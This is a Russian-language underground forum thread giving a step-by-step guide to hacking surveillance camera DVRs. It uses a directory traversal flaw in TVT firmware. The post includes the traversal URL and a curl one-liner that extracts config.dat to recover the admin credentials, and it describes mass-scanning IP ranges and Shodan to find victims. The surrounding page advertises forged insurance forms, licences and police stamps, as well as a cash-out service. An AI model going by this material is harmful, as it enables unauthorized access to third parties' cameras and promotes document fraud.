Обнал сервис MoneyTeam PolisBlank TheMoneyTeam diplomist
Взлом ВК
  1. Бланки ОСАГО по Акции. Хорошие цены и качество от сервиса TheMoneyTeam
    Заполненный ОСАГО всего за 1500р! С внесением в базу РСА (Росгосстрах) - 3500р

    А так же Вы можете приобрести:
    Бланки СТС СОР ВУ / Наклейки Визы / Галки МВД, Гостехнадзор / Различный ламинат
    Контакты оператора: Telegram: @TMTdocs
    С радостью проведем сделки через Гарант сервис форума DarkMarket.cc
    Сайт: tmtworld.biz

Взлом и получение доступа к камерам наблюдения.

Тема в разделе "Безопасность и аноноимность", создана пользователем Marlb0r0, 3/3/16.

  1. TopicStarter Overlay
    Marlb0r0

    Marlb0r0 Ветеран Модератор Проверенный продавец

    Написать в ЛС
    Последняя активность:
    29.03.17
    Регистрация:
    6/1/15
    Сообщения:
    940
    Симпатии:
    343
    Депозит:
    Всем привет, хочу донести до Вас информацию, может и есть в открытом доступе но она не расписана и не разжёванная. Сейчас очень много приходит информации о взломанных камерах наблюдениях, в банках, в учреждениях, даже на Украине на донбасе в последние время начали в мелькать подобные сообщения.

    [​IMG]


    Информация

    Для начала, посмотрим на саму уязвимость, она была виставлена на Exploit-DB с тайтлом «TVT TD-2308SS-B DVR directory traversal», — регистратор на 16 камер + 2 выхода на аудио, на котором стоит прошивка 3.2.0.P-3520A-00, и другие устройства с этой прошивкой. Атакующий может получить доступ к файлам конфигурации, таких как config.dat, где находится инфа для входа в веб интерфейс.

    Адрес где лежит конфигурационный файл.

    http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat
    1
    http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat
    Парсинг

    Именно для меня на данный момент такой способ парсинга самый актуальный.
    Использую я Advanced IP Scanner — линк на офф линк на офф

    Сам сканер. Выбран диапазон IP. Нас интересует шапка DVR Components Download

    [​IMG]

    Вот такой вид имеет панель входа.

    [​IMG]

    Вот код самого експлойта

    curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings
    1
    curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings
    Вот пример

    [​IMG]

    Ну и все в итоге у нас юзер и пасс от панели

    [​IMG]

    Maybe End

    Все очень и очень просто.
    Есть еще поисковик Shodan через который тоже можно искать камеры.
     
    Pavlichello, Admin, Lucifer и ещё 1-му нравится это.
  2. Инфо.Бот

    Инфо. Бот Администратор

    Просьба ознакомиться с основными правилами проекта Читать.
    В сети полно мошенников, которые умело могут Вас развести и завладеть вашими денежными средствами.
    Для безопасности сделок рекомендуем пользоваться услугами Гарант сервиса.
     
Похожие темы
  1. wm_market
    Ответов:
    43
    Просмотров:
    5.969
  2. VKHackers
    Ответов:
    25
    Просмотров:
    2.410
  3. KVANT
    Ответов:
    16
    Просмотров:
    2.557
  4. KVANT
    Ответов:
    6
    Просмотров:
    2.346
  5. sams
    Ответов:
    1
    Просмотров:
    684
Загрузка...
Обнал сервис
реклама на форуме реклама на форуме